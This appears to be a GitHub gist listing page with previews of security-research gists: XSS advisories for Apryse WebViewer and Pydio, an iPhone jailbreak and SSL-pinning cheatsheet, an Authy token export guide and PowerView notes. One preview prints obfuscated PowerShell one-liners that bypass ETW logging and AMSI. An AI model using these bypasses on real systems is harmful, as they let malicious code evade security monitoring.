Shariq Malik shariqmalik

@Xib3rR4dAr
Xib3rR4dAr / CVE-2024-57240_Apryse_WebViewer_XSS.md
Created March 13, 2025 09:53 — forked from devom3/CVE-2024-57240_Apryse_WebViewer_XSS.md
CVE-2024-57240: Cross-Site Scripting (XSS) Vulnerability in Apryse WebViewer <= 11.1

Date Published: Feb 24 2025

Summary

A Cross-Site Scripting (XSS) vulnerability has been identified in Apryse WebViewer versions up to and including 11.1. This vulnerability allows remote attackers to execute arbitrary JavaScript code by supplying a crafted PDF file. The issue arises due to improper sanitization of user-supplied input during PDF rendering.

Affected Product

@Xib3rR4dAr
Xib3rR4dAr / burp_intruder_all_printable_ascii_characters_list.md
Last active April 22, 2025 19:09
Burp Intruder all printable ASCII characters list
@Xib3rR4dAr
Xib3rR4dAr / Pydio_Core_8.2.5_Stored_XSS_PoC.md
Last active April 22, 2025 19:09
CVE-2024-40124 Pydio Core <= 8.2.5 Stored XSS PoC

Pydio Core <= 8.2.5 Stored XSS PoC

Advisory Information

Author: Muhammad Zeeshan (Xib3rR4dAr)
CVE: CVE-2024-40124
Title: Pydio Core <= 8.2.5 Stored XSS
Date published: June 25, 2024
Impact: Execution of malicious JavaScript leading to account takeover and phishing attacks.

@novitae
novitae / README.md
Last active February 20, 2025 19:12
Palera1n & SSL Pinning / Reverse Cheatsheet

Jailbreak

  • Download the latest release of palera1n.
  • Connect the iPhone to the computer.
  • Jailbreak using palera1n --setup-fakefs --fakefs. This sets up fakefs so that sudo is accessible later.
  • Once the phone is running, run palera1n -f to load fakefs. Do this every time you restart the phone to re-jailbreak it; there is no need to repeat the previous step if the phone wasn't reset.

Terminal

Connecting to SSH

  • Ensure the openssh package is installed via Sileo.
  • You can then connect with ssh mobile@IP
@reigningshells
reigningshells / powershell-bypasses.ps1
Last active May 7, 2025 22:16
Random PowerShell Bypasses
# Logging bypass:
(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))
# AMSI Bypass (old, burned)
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# New AMSI bypass obfuscation:
@gboudreau
gboudreau / AuthyToOtherAuthenticator.md
Last active June 7, 2025 09:54 — forked from Ingramz/AuthyToOtherAuthenticator.md
Export TOTP tokens from Authy

Exporting your 2FA tokens from Authy to transfer them into another 2FA application

IMPORTANT - Update regarding deprecation of Authy desktop apps

After August 2024, Authy stopped supporting the desktop version of their apps:
See "Authy is shutting down its desktop app | The 2FA app Authy will only be available on Android and iOS starting in August" for details.

And indeed, after a while, Authy changed something in their backend which now prevents the old desktop app from logging in. If you are already logged in, then you are in luck, and you can follow the instructions below to export your tokens.

If you are not logged in anymore, but can find a backup of the necessary files, then restore those files, and re-install Authy 2.2.3 following the instructions below, and it should work as expected.

@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active June 9, 2025 17:26
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set